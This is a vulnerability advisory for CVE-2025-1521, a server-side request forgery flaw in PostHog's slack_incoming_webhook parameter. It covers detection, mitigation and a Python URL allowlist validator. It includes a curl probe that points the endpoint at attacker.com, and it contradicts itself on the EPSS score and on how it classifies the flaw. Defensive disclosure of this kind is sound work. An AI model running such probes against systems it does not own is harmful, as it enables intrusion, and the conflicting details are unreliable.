Platform: other
Component: posthog
Fixed in: 8817.0.1
CVE-2025-1521 is an Information Disclosure vulnerability discovered in PostHog, a product analytics platform. This flaw allows remote attackers to potentially expose sensitive data due to insufficient validation of the slack_incoming_webhook parameter. The vulnerability affects versions prior to commit 6e8f035f9acd339c5ba87ba6ea40fc1ab3053d42, and a fix has been released.
The core of this vulnerability lies in PostHog's handling of the slack_incoming_webhook parameter. Because the parameter is not robustly validated, an attacker can supply a crafted URI that, when processed by PostHog, leads to the disclosure of sensitive information. Successful exploitation requires authentication. While the specific data exposed is not detailed, the potential for revealing internal configurations, API keys, or other sensitive data exists, depending on the resources reachable through the vulnerable parameter. This could lead to further compromise of the PostHog instance and potentially connected systems, enabling lateral movement within the environment.
This vulnerability was reported to ZDI (ZDI-CAN-25352) and subsequently disclosed publicly on 2025-04-23. The EPSS score is pending evaluation. There are currently no publicly available proof-of-concept exploits, but the relatively straightforward nature of the vulnerability suggests that one may emerge. Monitor security advisories and threat intelligence feeds for updates.
Organizations utilizing PostHog for product analytics, particularly those with integrations involving Slack or other external services, are at risk. Environments with less stringent input validation practices or those relying solely on default PostHog configurations are especially vulnerable.
• linux / server:

```shell
journalctl -u posthog | grep -i "slack_incoming_webhook"
```

• generic web:

```shell
curl -I https://your-posthog-instance/slack_incoming_webhook?url=http://attacker.com
```

Inspect the response headers and body for any unexpected data or error messages.
Exploit status: disclosure
EPSS: 0.55% (68th percentile)
The primary mitigation for CVE-2025-1521 is to immediately upgrade PostHog to commit 6e8f035f9acd339c5ba87ba6ea40fc1ab3053d42 or later. If an immediate upgrade is not feasible, consider a temporary workaround: restrict access to the slack_incoming_webhook endpoint and carefully validate any incoming URIs. Web application firewalls (WAFs) configured to inspect and filter URI parameters can also provide a layer of defense. After upgrading, confirm the vulnerability is resolved by attempting to trigger the vulnerable endpoint with a crafted URI and verifying that the request is properly rejected.
Update PostHog to the version that includes the fix (commit 6e8f035f9acd339c5ba87ba6ea40fc1ab3053d42) or later. This resolves the Server-Side Request Forgery vulnerability. Consult the release notes for further details on the update.
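The "carefully validate any incoming URIs" workaround described above, as an added example rather than PostHog's own code: a Python allowlist check that a Django-style backend could apply to a slack_incoming_webhook value before storing it or making the outbound request. It assumes legitimate webhooks live on hooks.slack.com under a /services/ path (Slack's documented layout); the function and exception names are invented for this example.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumed allowlist: Slack incoming webhooks are served from hooks.slack.com.
ALLOWED_WEBHOOK_HOSTS = {"hooks.slack.com"}


class WebhookUrlError(ValueError):
    """Raised when a slack_incoming_webhook value fails validation."""


def validate_slack_webhook_url(raw: str) -> str:
    """Return the trimmed URL if it is a plausible Slack webhook, else raise.

    The hostname allowlist is the real control; the other checks are defence
    in depth so that a later relaxation of the allowlist does not quietly turn
    the outbound POST into an SSRF primitive (cloud metadata, internal hosts).
    """
    if not isinstance(raw, str) or len(raw) > 2048:
        raise WebhookUrlError("webhook URL missing or too long")
    try:
        parts = urlsplit(raw.strip())
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError as exc:
        raise WebhookUrlError("malformed webhook URL") from exc
    if parts.scheme != "https":
        raise WebhookUrlError(f"scheme must be https, got {parts.scheme!r}")
    # "https://hooks.slack.com@10.0.0.1/..." parses the allowed name as userinfo.
    if parts.username or parts.password:
        raise WebhookUrlError("credentials in webhook URL are not allowed")
    host = (parts.hostname or "").rstrip(".").lower()  # tolerate a trailing dot
    if not host:
        raise WebhookUrlError("webhook URL has no host")
    # A literal v4/v6 address is never a Slack hostname; reject it outright.
    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass
    else:
        raise WebhookUrlError("literal IP addresses are not allowed")
    if port not in (None, 443):
        raise WebhookUrlError(f"unexpected port {port}")
    if host not in ALLOWED_WEBHOOK_HOSTS:
        raise WebhookUrlError(f"host {host!r} is not an allowed webhook host")
    if not parts.path.startswith("/services/"):
        raise WebhookUrlError("path does not look like a Slack webhook")
    return raw.strip()


def is_valid_slack_webhook_url(raw: str) -> bool:
    """Boolean wrapper for callers that prefer not to catch the exception."""
    try:
        validate_slack_webhook_url(raw)
    except WebhookUrlError:
        return False
    return True
```

Apply the check both when the value is saved and again immediately before the outbound request, so a value written through another code path still cannot reach an internal address.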
CVE-2025-1521 is a vulnerability in PostHog that allows attackers to disclose sensitive information due to improper URI validation in the slack_incoming_webhook parameter. It has a CVSS score of 7.1 (HIGH).
You are affected if you are running PostHog versions prior to 6e8f035f9acd339c5ba87ba6ea40fc1ab3053d42. Check your current version and upgrade immediately.
Upgrade PostHog to commit 6e8f035f9acd339c5ba87ba6ea40fc1ab3053d42 or later. As a temporary workaround, restrict access to the slack_incoming_webhook endpoint.
There are currently no confirmed reports of active exploitation, but the vulnerability is publicly known and a proof-of-concept may emerge.
Refer to the official PostHog security advisory for detailed information and updates: [https://posthog.com/security](https://posthog.com/security)